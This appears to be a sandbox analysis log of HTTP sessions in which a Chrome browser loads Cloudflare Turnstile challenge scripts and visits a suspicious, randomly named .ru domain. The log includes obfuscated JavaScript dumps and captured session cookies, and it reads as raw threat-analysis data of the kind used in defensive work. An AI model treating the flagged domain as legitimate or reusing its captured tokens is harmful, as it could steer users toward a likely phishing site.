                                              2024-12-18 22:41:51 UTC1369INData Raw: 2c 66 4b 2c 66 56 2c 66 5a 2c 67 32 2c 67 33 2c 67 74 2c 67 75 2c 67 45 2c 67 30 2c 67 31 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 31 31 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 33 31 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 37 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 31 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 39 34 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 33 33 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 36 32 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28
                                              Data Ascii: ,fK,fV,fZ,g2,g3,gt,gu,gE,g0,g1){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1311))/1+parseInt(gI(1331))/2*(-parseInt(gI(1617))/3)+-parseInt(gI(971))/4+-parseInt(gI(1794))/5*(-parseInt(gI(1033))/6)+parseInt(gI(562))/7+-parseInt(
                                              2024-12-18 22:41:51 UTC1369INData Raw: 78 5b 67 4f 28 31 32 36 38 29 5d 29 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 67 4f 28 31 35 33 36 29 5d 28 65 52 2c 67 2c 68 2c 44 29 2c 6f 5b 67 4f 28 31 38 36 30 29 5d 28 42 2c 45 29 3f 28 46 3d 27 73 27 3d 3d 3d 45 26 26 21 67 5b 67 4f 28 31 31 38 32 29 5d 28 68 5b 44 5d 29 2c 67 4f 28 35 35 33 29 3d 3d 3d 69 2b 44 3f 73 28 6f 5b 67 4f 28 31 38 30 35 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 73 28 6f 5b 67 4f 28 38 33 39 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 6f 5b 67 4f 28 37 32 32 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4e 29 7b 67 4e 3d 62 2c 4f 62 6a 65 63 74 5b 67 4e 28 39 30 39 29 5d 5b 67 4e 28 38 31 37 29 5d 5b 67 4e 28 36 33 30 29 5d 28 6a 2c 48 29 7c 7c 28
                                              Data Ascii: x[gO(1268)]);D=x[C],E=o[gO(1536)](eR,g,h,D),o[gO(1860)](B,E)?(F='s'===E&&!g[gO(1182)](h[D]),gO(553)===i+D?s(o[gO(1805)](i,D),E):F||s(o[gO(839)](i,D),h[D])):o[gO(722)](s,i+D,E),C++);return j;function s(G,H,gN){gN=b,Object[gN(909)][gN(817)][gN(630)](j,H)||(
                                              2024-12-18 22:41:51 UTC1369INData Raw: 6a 5b 67 54 28 31 32 32 39 29 5d 3d 67 54 28 31 31 30 30 29 2c 6a 5b 67 54 28 31 33 37 39 29 5d 3d 67 54 28 35 38 37 29 2c 6a 5b 67 54 28 31 35 36 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 4a 29 7b 72 65 74 75 72 6e 20 49 7c 7c 4a 7d 2c 6a 5b 67 54 28 39 34 37 29 5d 3d 67 54 28 37 38 35 29 2c 6a 5b 67 54 28 38 32 37 29 5d 3d 67 54 28 37 39 32 29 2c 6a 5b 67 54 28 31 33 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 49 2c 4a 29 7b 72 65 74 75 72 6e 20 49 2b 4a 7d 2c 6a 29 3b 74 72 79 7b 66 6f 72 28 6c 3d 67 54 28 31 33 32 34 29 5b 67 54 28 39 33 30 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 3d 6b 5b 67 54 28 39 35 36 29 5d 28 6b 5b 67 54 28 39 35 36 29 5d 28 6b 5b 67 54 28
                                              Data Ascii: j[gT(1229)]=gT(1100),j[gT(1379)]=gT(587),j[gT(1568)]=function(I,J){return I||J},j[gT(947)]=gT(785),j[gT(827)]=gT(792),j[gT(1352)]=function(I,J){return I+J},j);try{for(l=gT(1324)[gT(930)]('|'),m=0;!![];){switch(l[m++]){case'0':n=k[gT(956)](k[gT(956)](k[gT(
                                              2024-12-18 22:41:51 UTC1369INData Raw: 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 63 61 74 63 68 28 49 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 32 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 67 55 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 76 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 55 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 67 55 28 31 30 31 30 29 5d 3d 67 55 28 31 38 31 38 29 2c 66 5b 67 55 28 31 34 34 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 66 5b 67 55 28 39 30 31 29 5d 3d 67 55 28 31 36 35 35 29 2c 67 3d 66 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 67 55 28 31 38 31 38 29 21 3d 3d 67 5b 67 55 28 31 30 31 30 29 5d 3f 28 69 5b 67 55 28 31 34 32 30 29 5d 5b 67 55 28 31 38 36 32 29 5d 3d 6a 5b 67 55 28 37 39 34 29
                                              Data Ascii: =5e3;continue}break}}catch(I){}},eM[gJ(1265)]=function(e,gU,f,g,h,i,j,k,v,l,m,n,o){(gU=gJ,f={},f[gU(1010)]=gU(1818),f[gU(1442)]=function(s,v){return v===s},f[gU(901)]=gU(1655),g=f,e instanceof Error)?gU(1818)!==g[gU(1010)]?(i[gU(1420)][gU(1862)]=j[gU(794)
                                              2024-12-18 22:41:51 UTC1369INData Raw: 67 4a 28 31 35 36 35 29 5d 3d 66 30 2c 66 32 3d 65 4d 5b 67 4a 28 31 34 32 30 29 5d 5b 67 4a 28 39 30 37 29 5d 5b 67 4a 28 36 31 38 29 5d 2c 66 33 3d 65 4d 5b 67 4a 28 31 34 32 30 29 5d 5b 67 4a 28 39 30 37 29 5d 5b 67 4a 28 31 31 35 35 29 5d 2c 66 34 3d 65 4d 5b 67 4a 28 31 34 32 30 29 5d 5b 67 4a 28 39 30 37 29 5d 5b 67 4a 28 31 37 34 30 29 5d 2c 66 67 3d 21 5b 5d 2c 66 73 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 33 38 36 29 5d 28 67 4a 28 31 38 39 33 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 68 48 2c 64 2c 65 29 7b 68 48 3d 67 4a 2c 64 3d 7b 27 50 5a 45 49 51 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 21 3d 3d 66 7d 2c 27 49 4a 6f 5a 4d 27 3a 68 48 28 35 32 30 29 2c 27 4e 63 68 49 44 27 3a 68 48 28 31 31 35 33 29
                                              Data Ascii: gJ(1565)]=f0,f2=eM[gJ(1420)][gJ(907)][gJ(618)],f3=eM[gJ(1420)][gJ(907)][gJ(1155)],f4=eM[gJ(1420)][gJ(907)][gJ(1740)],fg=![],fs=undefined,eM[gJ(1386)](gJ(1893),function(c,hH,d,e){hH=gJ,d={'PZEIQ':function(f,g){return g!==f},'IJoZM':hH(520),'NchID':hH(1153)
                                              2024-12-18 22:41:51 UTC1369INData Raw: 5d 28 67 31 29 2c 67 31 2b 2b 29 3b 67 32 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 30 34 39 29 29 2c 67 33 3d 61 74 6f 62 28 67 4a 28 31 30 36 37 29 29 2c 67 74 3d 66 75 6e 63 74 69 6f 6e 28 69 4b 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 4b 3d 67 4a 2c 64 3d 7b 27 69 4f 76 63 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 79 65 67 49 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 3e 69 7d 2c 27 71 50 71 53 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4d 5a 56 6a 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 5e 69 7d 2c 27 4f 62 4b 74 6d 27 3a 69 4b 28 31 33 35 36 29 2c 27 4c 52 73 52 44 27 3a 69
                                              Data Ascii: ](g1),g1++);g2=(0,eval)(gJ(1049)),g3=atob(gJ(1067)),gt=function(iK,d,e,f,g){return iK=gJ,d={'iOvcv':function(h,i){return h-i},'yegIR':function(h,i){return h>>i},'qPqSL':function(h,i){return h&i},'MZVjd':function(h,i){return h^i},'ObKtm':iK(1356),'LRsRD':i
                                              2024-12-18 22:41:51 UTC1369INData Raw: 41 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 7a 43 69 62 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 44 68 74 71 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 76 41 4e 77 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 69 4b 28 37 39 35 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 4c 29 7b 72 65 74 75 72 6e 20 69 4c 3d 62 2c 69 4c 28 38 33 37 29 5b 69 4c 28 31 38 30 33 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66
                                              Data Ascii: AH':function(h,i){return i&h},'zCibS':function(h,i){return h<i},'Dhtqx':function(h,i){return h==i},'vANwV':function(h,i){return i===h}},e=String[iK(795)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,iL){return iL=b,iL(837)[iL(1803)](i)})},'g':f
                                              2024-12-18 22:41:52 UTC1369INData Raw: 5b 74 68 69 73 2e 67 5e 32 34 34 2e 39 37 5d 5b 31 5d 5b 69 51 28 31 34 38 33 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 34 2e 30 37 5d 5b 30 5d 2b 2b 29 2c 32 32 31 29 2b 32 35 36 26 32 35 35 2e 38 29 2c 50 3d 73 5b 69 51 28 31 35 35 32 29 5d 28 74 68 69 73 2e 68 5b 32 34 34 2e 38 31 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 73 5b 69 51 28 31 33 33 37 29 5d 28 73 5b 69 51 28 31 34 30 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 34 2e 35 35 5d 5b 31 5d 5b 69 51 28 31 34 38 33 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 34 2e 38 35 5d 5b 30 5d 2b 2b 29 2c 32 32 31 29 2b 32 35 36 2c 32 35 35 29 29 2c 6a 3d 54 5b 69 51 28 31 36 32 35 29 5d 28 32 2c 73 5b 69 51 28 31 35 33 32 29 5d 28 28 32 35 35 26 53 29 3c 3c 34 2c 73 5b
                                              Data Ascii: [this.g^244.97][1][iQ(1483)](this.h[this.g^244.07][0]++),221)+256&255.8),P=s[iQ(1552)](this.h[244.81^this.g][3],s[iQ(1337)](s[iQ(1406)](this.h[this.g^244.55][1][iQ(1483)](this.h[this.g^244.85][0]++),221)+256,255)),j=T[iQ(1625)](2,s[iQ(1532)]((255&S)<<4,s[


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449766104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:51 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:52 UTC240INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:52 GMT
                                              Content-Type: image/png
                                              Content-Length: 61
                                              Connection: close
                                              cache-control: max-age=2629800, public
                                              Server: cloudflare
                                              CF-RAY: 8f42a9ac3e0e43df-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449753172.67.166.864434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:52 UTC1317OUTGET /favicon.ico HTTP/1.1
                                              Host: to.eemjhiulz.ru
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://to.eemjhiulz.ru/zO7RFNG/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: XSRF-TOKEN=eyJpdiI6InZXYU9uSG80Tk5zNURUZDNkKytMMXc9PSIsInZhbHVlIjoiTDdlbTlqUWJZSTA0V2JBZkJzZkR4bVhGaC9jVHBrRUVtcnMrY0E3eTU4cXdZMEMvSzRVTElTVHpXSEZqRURFZkgrV3hoekhOcTkyaVZlMVJmeFhBWkRtUmRBaWNycWw2OWllOFQzRW5EL3lVSzhvMXYxaXkxbmQ2Yld3VWVadG8iLCJtYWMiOiJjOTg2NWRkMGY1MmI0OThhN2NmYWY4YjU5ZTc1MDM4MjBhNTZiNDYyOTk3YjY0ODM4YjkxOGIwYjc2ODQ1YzI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqbHV3U1BQeG1yaGE2TVlVUlJEeFE9PSIsInZhbHVlIjoiVWs5R29rVzNHNjBHOHIzSUtXWUNqZXlqYXgxOWhCT0oxandtT29Qb2tLK3VoU2grVlNmcFQ2L3lPcC9Db1NlejVwZFdFRkQ2dGpCdHg4Q2s3T3RxNzdURnJXZERKY2tOZXlsVkhrdFJlT2RiaU1UYTV1TmozTTZla2cvOG53clkiLCJtYWMiOiI4MGNjYjU1ZTNmMDBmMzRmN2JjMTZhYzU2NDM2YTY3MDE0MmVmZjk4MWI4ODZhMDAwMzEzMWNiODlmZTU2YjkzIiwidGFnIjoiIn0%3D
                                              2024-12-18 22:41:52 UTC1072INHTTP/1.1 404 Not Found
                                              Date: Wed, 18 Dec 2024 22:41:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Cache-Control: max-age=14400
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=saFgmiTc5V41N8BgPBOMaBvy7irAvCw%2Btf3FREkyT8h9lOkR3%2FyLaeY6s%2B9SSfoqZyWMbiEXBp2PkYnjSiYdr16KA6dwwvSm07Ed8EgdJZnHJ%2FCXmi1HeYiivW2H5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=4351&min_rtt=4329&rtt_var=1639&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2141&delivery_rate=657888&cwnd=235&unsent_bytes=0&cid=29ada7859f713f83&ts=4616&x=0"
                                              CF-Cache-Status: HIT
                                              Age: 14381
                                              Server: cloudflare
                                              CF-RAY: 8f42a9b07bf90f51-EWR
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1708&rtt_var=662&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1895&delivery_rate=1626740&cwnd=204&unsent_bytes=0&cid=d1a5b15ed5311229&ts=9228&x=0"
                                              2024-12-18 22:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449767104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:53 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:53 UTC240INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:53 GMT
                                              Content-Type: image/png
                                              Content-Length: 61
                                              Connection: close
                                              cache-control: max-age=2629800, public
                                              Server: cloudflare
                                              CF-RAY: 8f42a9b6dd674299-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449768104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:53 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f42a9a00a2d7286&lang=auto HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:55 UTC331INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:55 GMT
                                              Content-Type: application/javascript; charset=UTF-8
                                              Content-Length: 116206
                                              Connection: close
                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Server: cloudflare
                                              CF-RAY: 8f42a9bef94d8ce8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:55 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                              2024-12-18 22:41:55 UTC1369INData Raw: 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25
                                              Data Ascii: y%2C%20always%20pass.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_feedback_report":"Having%20trouble%
                                              2024-12-18 22:41:55 UTC1369INData Raw: 2c 67 30 2c 67 36 2c 67 37 2c 67 38 2c 67 69 2c 67 74 2c 67 78 2c 67 45 2c 65 52 2c 65 53 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 30 38 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 35 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 34 35 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 33 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 38 32 33 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 37 38 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 39 36 29 29 2f 37 2b 70 61 72 73 65 49 6e 74
                                              Data Ascii: ,g0,g6,g7,g8,gi,gt,gx,gE,eR,eS){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1308))/1*(parseInt(gI(1135))/2)+-parseInt(gI(345))/3*(-parseInt(gI(833))/4)+parseInt(gI(823))/5*(-parseInt(gI(1678))/6)+-parseInt(gI(1596))/7+parseInt
                                              2024-12-18 22:41:55 UTC1369INData Raw: 37 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 68 7a 28 35 37 37 29 5d 3b 47 5b 48 2b 31 5d 3d 3d 3d 47 5b 48 5d 3f 47 5b 68 7a 28 35 38 32 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 79 28 39 37 36 29 5d 5b 68 79 28 31 35 32 35 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 79 28 35 37 37 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 6e 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 79 28 31 35 39 31 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 79 28 37 35 35 29 5d 28 68 79 28 31 37 33 33 29 2c 69 2b 44 29 3f 6f 5b 68 79 28 31 36 38 36 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 6f 5b 68 79 28 31 30 35 39
                                              Data Ascii: 7)](),H=0;H<G[hz(577)];G[H+1]===G[H]?G[hz(582)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[hy(976)][hy(1525)](B),C=0;C<x[hy(577)];D=x[C],E=fn(g,h,D),B(E)?(F=E==='s'&&!g[hy(1591)](h[D]),o[hy(755)](hy(1733),i+D)?o[hy(1686)](s,i+D,E):F||s(o[hy(1059
                                              2024-12-18 22:41:55 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 41 6a 73 7a 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 41 63 57 42 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4d 7a 4d 67 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 54 4f 45 51 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 78 67 63 48 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 54 48 77 47 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 79 6d 71 49 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b
                                              Data Ascii: :function(h,i){return h(i)},'AjszJ':function(h,i){return h>i},'AcWBS':function(h,i){return h-i},'MzMgX':function(h,i){return h(i)},'TOEQf':function(h,i){return h>i},'xgcHM':function(h,i){return h&i},'THwGh':function(h,i){return h>i},'ymqIr':function(h,i){
